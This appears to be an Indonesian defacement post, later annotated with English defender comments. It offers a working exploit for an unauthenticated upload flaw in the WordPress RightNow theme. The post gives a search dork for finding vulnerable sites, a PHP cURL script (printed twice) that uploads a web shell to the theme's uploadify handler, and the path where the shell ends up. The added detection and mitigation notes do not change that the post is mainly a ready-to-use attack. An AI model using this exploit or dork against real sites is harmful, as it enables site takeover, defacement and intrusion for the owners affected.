Deface Menggunakan WordPress RightNow Theme Uploadify Shell Upload
# Title : WordPress RightNow Theme Uploadify Shell Upload
# Author : eX-Sh1Ne Dork
# Date : 04/04/2015
# Dork : inurl:"wp-content/themes/RightNow/" ( silahkan di experimen sendiri dork nya )
# Vuln : http://www.site.com/path/wp-content/them..._image.php
# Ganti up.php dengan nama shell agan yg udh di copas ke folder c:\xampp\php ( bagi pengguna Windus )
<?php
/*
 * Proof-of-concept client for the upload handler shipped with the RightNow
 * theme (includes/uploadify/upload_background_image.php).
 *
 * The script builds one HTTP POST with two form fields, 'Filedata' and
 * 'folder', and prints whatever the server answers. The request carries no
 * cookie, nonce or credential, so a handler that accepts it is reachable
 * without a WordPress session.
 *
 * NOTE(review): the handler itself is not shown here. The surrounding text
 * claims the file ends up under wp-content/uploads/galleryimages/; confirm
 * this against the theme source.
 *
 * Defender notes:
 *  - Detection: POST requests to .../themes/RightNow/includes/uploadify/
 *    upload_background_image.php in the access log, and .php files appearing
 *    under wp-content/uploads/galleryimages/.
 *  - Mitigation: remove or update the theme, require an authenticated session
 *    with a capability and nonce check in the handler, allow-list image types
 *    server-side, and configure the web server so that nothing under
 *    wp-content/uploads/ is executed as PHP.
 */

// Local file whose contents are attached to the request.
$uploadfile="up.php";
// Target is a loopback (127.0.0.1) install, i.e. a local test instance.
$ch = curl_init("http://127.0.0.1/wp-content/themes/RightNow//includes/uploadify/upload_background_image.php");
curl_setopt($ch, CURLOPT_POST, true);
// Passing an array makes cURL send multipart/form-data. The leading "@" is
// the legacy file-attachment prefix; it is only treated as "attach this file"
// on PHP versions that still honour it, otherwise the literal string is sent.
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
// Return the response body from curl_exec() instead of echoing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// curl_exec() returns false on transport failure; the result is not checked,
// so a failed request prints an empty string below.
$postResult = curl_exec($ch);
curl_close($ch);
// The raw server response is printed as-is.
print "$postResult";
?>
# Shell Uploaded At www.site.com/wp-content/uploads/galleryimages/shell.php
# Author : eX-Sh1Ne Dork
# Date : 04/04/2015
# Dork : inurl:"wp-content/themes/RightNow/" ( silahkan di experimen sendiri dork nya )
# Vuln : http://www.site.com/path/wp-content/them..._image.php
# Ganti up.php dengan nama shell agan yg udh di copas ke folder c:\xampp\php ( bagi pengguna Windus )
<?php
/*
 * Second copy of the proof-of-concept client for the RightNow theme's
 * includes/uploadify/upload_background_image.php handler.
 *
 * It sends a single unauthenticated POST (no cookie, nonce or credential is
 * set) with the form fields 'Filedata' and 'folder', then prints the response.
 *
 * NOTE(review): what the handler does with the fields is not visible here;
 * the page text states the stored file is reachable under
 * wp-content/uploads/galleryimages/. Verify against the theme source.
 *
 * Defender notes:
 *  - Detection: access-log entries for POSTs to the uploadify handler path
 *    and newly created .php files in wp-content/uploads/galleryimages/.
 *  - Mitigation: remove or patch the theme, enforce session, capability and
 *    nonce checks plus a server-side image type allow-list in the handler,
 *    and disable PHP execution for the uploads directory.
 */

// Name of the local file to attach.
$uploadfile="up.php";
// Loopback address: the request goes to a locally hosted test site.
$ch = curl_init("http://127.0.0.1/wp-content/themes/RightNow//includes/uploadify/upload_background_image.php");
curl_setopt($ch, CURLOPT_POST, true);
// Array form => multipart/form-data body. "@" is the legacy attachment
// prefix; where PHP no longer honours it the literal string is sent instead.
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
// Capture the response body as the return value of curl_exec().
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// No error check: on failure curl_exec() yields false and nothing useful is
// printed.
$postResult = curl_exec($ch);
curl_close($ch);
// Output the server's response unchanged.
print "$postResult";
?>
# Shell Uploaded At www.site.com/wp-content/uploads/galleryimages/shell.php